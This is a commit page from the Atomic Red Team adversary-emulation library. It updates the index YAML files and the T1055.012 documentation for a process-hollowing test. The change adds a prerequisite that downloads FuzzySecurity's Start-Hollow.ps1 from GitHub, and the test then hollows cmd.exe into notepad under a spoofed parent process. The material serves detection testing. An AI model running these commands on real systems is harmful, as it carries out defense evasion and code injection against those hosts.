security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generated docs from job=generate-docs branch=master [ci skip]

Browse Source
This commit is contained in:
Atomic Red Team doc generator
2025-07-17 22:30:09 +00:00
parent b0b572815d
commit 3aaf3364aa
3 changed files with 120 additions and 9 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/index.yaml
+50 -4
View File
@@ -23819,6 +23819,14 @@ defense-evasion:
supported_platforms:
- windows
input_arguments:
script_download_url:
description: Download url for Start-Hollow.ps1
type: string
default: https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/720d8fe82396faf74f2ca19a3fe99a5c262a14b9/Start-Hollow.ps1
script_path:
description: Path to Start-Hollow.ps1
type: path
default: PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1
hollow_binary_path:
description: Path of the binary to hollow (executable that will run inside
the sponsor)
@@ -23838,7 +23846,7 @@ defense-evasion:
default: notepad
executor:
command: |
. "$PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1"
. "#{script_path}"
$ppid=Get-Process #{parent_process_name} | select -expand id
Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction
@@ -23846,6 +23854,21 @@ defense-evasion:
'
name: powershell
dependency_executor_name: powershell
dependencies:
- description: 'Start-Hollow.ps1 must be installed
'
prereq_command: 'if (Test-Path "#{script_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
try {
iwr "#{script_download_url}" -OutFile (New-Item -Path #{script_path} -Force)
} catch {
Write-Error $_
Exit 1
}
- name: RunPE via VBA
auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
description: 'This module executes notepad.exe from within the WINWORD.EXE process
@@ -23931,7 +23954,7 @@ defense-evasion:
-program "#{hollow_binary_path}" -debug
'
cleanup_command: |-
cleanup_command: |
Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
T1564.009:
@@ -46361,6 +46384,14 @@ privilege-escalation:
supported_platforms:
- windows
input_arguments:
script_download_url:
description: Download url for Start-Hollow.ps1
type: string
default: https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/720d8fe82396faf74f2ca19a3fe99a5c262a14b9/Start-Hollow.ps1
script_path:
description: Path to Start-Hollow.ps1
type: path
default: PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1
hollow_binary_path:
description: Path of the binary to hollow (executable that will run inside
the sponsor)
@@ -46380,7 +46411,7 @@ privilege-escalation:
default: notepad
executor:
command: |
. "$PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1"
. "#{script_path}"
$ppid=Get-Process #{parent_process_name} | select -expand id
Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction
@@ -46388,6 +46419,21 @@ privilege-escalation:
'
name: powershell
dependency_executor_name: powershell
dependencies:
- description: 'Start-Hollow.ps1 must be installed
'
prereq_command: 'if (Test-Path "#{script_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
try {
iwr "#{script_download_url}" -OutFile (New-Item -Path #{script_path} -Force)
} catch {
Write-Error $_
Exit 1
}
- name: RunPE via VBA
auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
description: 'This module executes notepad.exe from within the WINWORD.EXE process
@@ -46473,7 +46519,7 @@ privilege-escalation:
-program "#{hollow_binary_path}" -debug
'
cleanup_command: |-
cleanup_command: |
Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
T1068:
atomics/Indexes/windows-index.yaml
+50 -4
View File
@@ -19697,6 +19697,14 @@ defense-evasion:
supported_platforms:
- windows
input_arguments:
script_download_url:
description: Download url for Start-Hollow.ps1
type: string
default: https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/720d8fe82396faf74f2ca19a3fe99a5c262a14b9/Start-Hollow.ps1
script_path:
description: Path to Start-Hollow.ps1
type: path
default: PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1
hollow_binary_path:
description: Path of the binary to hollow (executable that will run inside
the sponsor)
@@ -19716,7 +19724,7 @@ defense-evasion:
default: notepad
executor:
command: |
. "$PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1"
. "#{script_path}"
$ppid=Get-Process #{parent_process_name} | select -expand id
Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction
@@ -19724,6 +19732,21 @@ defense-evasion:
'
name: powershell
dependency_executor_name: powershell
dependencies:
- description: 'Start-Hollow.ps1 must be installed
'
prereq_command: 'if (Test-Path "#{script_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
try {
iwr "#{script_download_url}" -OutFile (New-Item -Path #{script_path} -Force)
} catch {
Write-Error $_
Exit 1
}
- name: RunPE via VBA
auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
description: 'This module executes notepad.exe from within the WINWORD.EXE process
@@ -19809,7 +19832,7 @@ defense-evasion:
-program "#{hollow_binary_path}" -debug
'
cleanup_command: |-
cleanup_command: |
Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
T1564.009:
@@ -38413,6 +38436,14 @@ privilege-escalation:
supported_platforms:
- windows
input_arguments:
script_download_url:
description: Download url for Start-Hollow.ps1
type: string
default: https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/720d8fe82396faf74f2ca19a3fe99a5c262a14b9/Start-Hollow.ps1
script_path:
description: Path to Start-Hollow.ps1
type: path
default: PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1
hollow_binary_path:
description: Path of the binary to hollow (executable that will run inside
the sponsor)
@@ -38432,7 +38463,7 @@ privilege-escalation:
default: notepad
executor:
command: |
. "$PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1"
. "#{script_path}"
$ppid=Get-Process #{parent_process_name} | select -expand id
Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction
@@ -38440,6 +38471,21 @@ privilege-escalation:
'
name: powershell
dependency_executor_name: powershell
dependencies:
- description: 'Start-Hollow.ps1 must be installed
'
prereq_command: 'if (Test-Path "#{script_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
try {
iwr "#{script_download_url}" -OutFile (New-Item -Path #{script_path} -Force)
} catch {
Write-Error $_
Exit 1
}
- name: RunPE via VBA
auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
description: 'This module executes notepad.exe from within the WINWORD.EXE process
@@ -38525,7 +38571,7 @@ privilege-escalation:
-program "#{hollow_binary_path}" -debug
'
cleanup_command: |-
cleanup_command: |
Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
T1068:
atomics/T1055.012/T1055.012.md
+20 -1
View File
@@ -39,6 +39,8 @@ Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script_download_url | Download url for Start-Hollow.ps1 | string | https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/720d8fe82396faf74f2ca19a3fe99a5c262a14b9/Start-Hollow.ps1|
| script_path | Path to Start-Hollow.ps1 | path | PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1|
| hollow_binary_path | Path of the binary to hollow (executable that will run inside the sponsor) | string | C:\Windows\System32\cmd.exe|
| parent_process_name | Name of the parent process | string | explorer|
| sponsor_binary_path | Path of the sponsor binary (executable that will host the binary) | string | C:\Windows\System32\notepad.exe|
@@ -49,7 +51,7 @@ Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/
```powershell
. "$PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1"
. "#{script_path}"
$ppid=Get-Process #{parent_process_name} | select -expand id
Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
```
@@ -61,6 +63,23 @@ Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
#### Dependencies: Run with `powershell`!
##### Description: Start-Hollow.ps1 must be installed
##### Check Prereq Commands:
```powershell
if (Test-Path "#{script_path}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
try {
iwr "#{script_download_url}" -OutFile (New-Item -Path #{script_path} -Force)
} catch {
Write-Error $_
Exit 1
}
```
<br/>